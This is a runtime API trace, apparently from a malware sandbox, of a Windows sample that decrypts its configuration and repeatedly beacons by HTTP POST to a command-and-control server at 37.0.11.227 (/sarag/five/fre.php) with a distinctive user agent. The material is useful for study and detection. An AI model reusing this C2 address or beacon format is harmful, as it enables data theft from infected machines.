returned 0x6a2f48 [0186.988] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0186.988] GetProcessHeap () returned 0x690000 [0186.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0186.989] GetProcessHeap () returned 0x690000 [0186.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0186.989] GetProcessHeap () returned 0x690000 [0186.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0186.989] GetProcessHeap () returned 0x690000 [0186.989] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0186.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.991] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0186.997] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0187.004] GetProcessHeap () returned 0x690000 [0187.004] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0187.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.005] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0187.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.007] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0187.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.010] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.010] GetProcessHeap () returned 0x690000 [0187.010] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0187.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.011] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0187.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.012] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0187.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.013] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0187.013] GetProcessHeap () returned 0x690000 [0187.013] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0187.014] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.014] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0187.015] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.015] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0187.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.016] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0187.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.017] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0187.017] GetProcessHeap () returned 0x690000 [0187.018] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0187.018] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3da8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea90*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0187.020] GetProcessHeap () returned 0x690000 [0187.020] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0187.020] socket (af=2, type=1, protocol=6) returned 0x350 [0187.020] connect (s=0x350, name=0x6aea90*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0187.048] FreeAddrInfoW (pAddrInfo=0x6b3da8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea90*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0187.048] GetProcessHeap () returned 0x690000 [0187.048] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0187.048] GetProcessHeap () returned 0x690000 [0187.048] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b3f90 [0187.049] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0187.050] wvsprintfA (in: param_1=0x6b3f90, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0187.050] GetProcessHeap () returned 0x690000 [0187.050] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0187.050] GetProcessHeap () returned 0x690000 [0187.050] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0187.050] GetProcessHeap () returned 0x690000 [0187.050] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0187.050] GetProcessHeap () returned 0x690000 [0187.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b3f90 [0187.053] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0187.053] wvsprintfA (in: param_1=0x6b3f90, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0187.053] GetProcessHeap () returned 0x690000 [0187.054] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0187.054] GetProcessHeap () returned 0x690000 [0187.054] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0187.054] send (s=0x350, buf=0x6abd08*, len=242, flags=0) returned 242 [0187.055] send (s=0x350, buf=0x6aba40*, len=159, flags=0) returned 159 [0187.055] GetProcessHeap () returned 0x690000 [0187.057] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0187.057] recv (in: s=0x350, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0187.144] GetProcessHeap () returned 0x690000 [0187.144] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0187.144] GetProcessHeap () returned 0x690000 [0187.144] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0187.145] GetProcessHeap () returned 0x690000 [0187.145] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0187.145] GetProcessHeap () returned 0x690000 [0187.145] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0187.145] closesocket (s=0x350) returned 0 [0187.146] GetProcessHeap () returned 0x690000 [0187.146] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0187.146] GetProcessHeap () returned 0x690000 [0187.146] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0187.146] GetProcessHeap () returned 0x690000 [0187.147] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0187.147] GetProcessHeap () returned 0x690000 [0187.147] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0187.147] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1090) returned 0x350 [0187.149] Sleep (dwMilliseconds=0xea60) [0187.154] GetProcessHeap () returned 0x690000 [0187.154] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0187.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.157] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0187.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.165] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0187.176] GetProcessHeap () returned 0x690000 [0187.176] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0187.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.177] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0187.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.178] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0187.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.180] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.180] GetProcessHeap () returned 0x690000 [0187.180] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0187.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.181] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0187.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.197] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0187.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.199] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0187.199] GetProcessHeap () returned 0x690000 [0187.199] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0187.199] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.200] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0187.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.201] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0187.201] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.202] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0187.202] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.203] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0187.203] GetProcessHeap () returned 0x690000 [0187.203] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0187.203] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0187.203] GetProcessHeap () returned 0x690000 [0187.204] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0187.452] GetProcessHeap () returned 0x690000 [0187.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0187.560] GetProcessHeap () returned 0x690000 [0187.561] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0187.561] GetProcessHeap () returned 0x690000 [0187.561] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0187.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.589] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0187.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.597] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0187.605] GetProcessHeap () returned 0x690000 [0187.605] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0187.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.606] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0187.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.608] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0187.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.609] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.609] GetProcessHeap () returned 0x690000 [0187.609] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0187.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.617] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0187.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.618] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0187.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.620] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0187.620] GetProcessHeap () returned 0x690000 [0187.620] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0187.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.621] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0187.622] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.622] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0187.623] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.623] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0187.624] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.624] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0187.624] GetProcessHeap () returned 0x690000 [0187.624] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0187.625] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3ab0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae958*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0187.625] GetProcessHeap () returned 0x690000 [0187.625] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0187.625] socket (af=2, type=1, protocol=6) returned 0x354 [0187.625] connect (s=0x354, name=0x6ae958*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0187.651] FreeAddrInfoW (pAddrInfo=0x6b3ab0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae958*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0187.651] GetProcessHeap () returned 0x690000 [0187.651] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0187.651] GetProcessHeap () returned 0x690000 [0187.651] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b3f90 [0187.652] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0187.653] wvsprintfA (in: param_1=0x6b3f90, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0187.653] GetProcessHeap () returned 0x690000 [0187.653] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0187.653] GetProcessHeap () returned 0x690000 [0187.653] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0187.653] GetProcessHeap () returned 0x690000 [0187.653] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0187.653] GetProcessHeap () returned 0x690000 [0187.653] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b3f90 [0187.654] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0187.655] wvsprintfA (in: param_1=0x6b3f90, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0187.655] GetProcessHeap () returned 0x690000 [0187.655] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0187.655] GetProcessHeap () returned 0x690000 [0187.656] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0187.656] send (s=0x354, buf=0x6abd08*, len=242, flags=0) returned 242 [0187.656] send (s=0x354, buf=0x6aba40*, len=159, flags=0) returned 159 [0187.657] GetProcessHeap () returned 0x690000 [0187.657] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0187.657] recv (in: s=0x354, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0187.736] GetProcessHeap () returned 0x690000 [0187.737] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0187.739] GetProcessHeap () returned 0x690000 [0187.739] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0187.739] GetProcessHeap () returned 0x690000 [0187.739] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0187.739] GetProcessHeap () returned 0x690000 [0187.740] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0187.740] closesocket (s=0x354) returned 0 [0187.742] GetProcessHeap () returned 0x690000 [0187.742] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0187.742] GetProcessHeap () returned 0x690000 [0187.742] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0187.742] GetProcessHeap () returned 0x690000 [0187.743] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0187.743] GetProcessHeap () returned 0x690000 [0187.743] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0187.743] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1098) returned 0x354 [0187.745] Sleep (dwMilliseconds=0xea60) [0187.747] GetProcessHeap () returned 0x690000 [0187.747] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0187.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.752] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0187.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.758] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0187.765] GetProcessHeap () returned 0x690000 [0187.765] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0187.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.766] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0187.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.767] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0187.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.768] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.768] GetProcessHeap () returned 0x690000 [0187.768] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0187.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.769] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0187.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.770] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0187.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.771] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0187.771] GetProcessHeap () returned 0x690000 [0187.771] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0187.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.771] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0187.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.772] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0187.773] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.773] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0187.774] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.774] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0187.774] GetProcessHeap () returned 0x690000 [0187.774] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0187.774] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0187.774] GetProcessHeap () returned 0x690000 [0187.775] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0187.775] GetProcessHeap () returned 0x690000 [0187.775] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0187.775] GetProcessHeap () returned 0x690000 [0187.776] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0187.776] GetProcessHeap () returned 0x690000 [0187.776] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0187.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0187.778] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 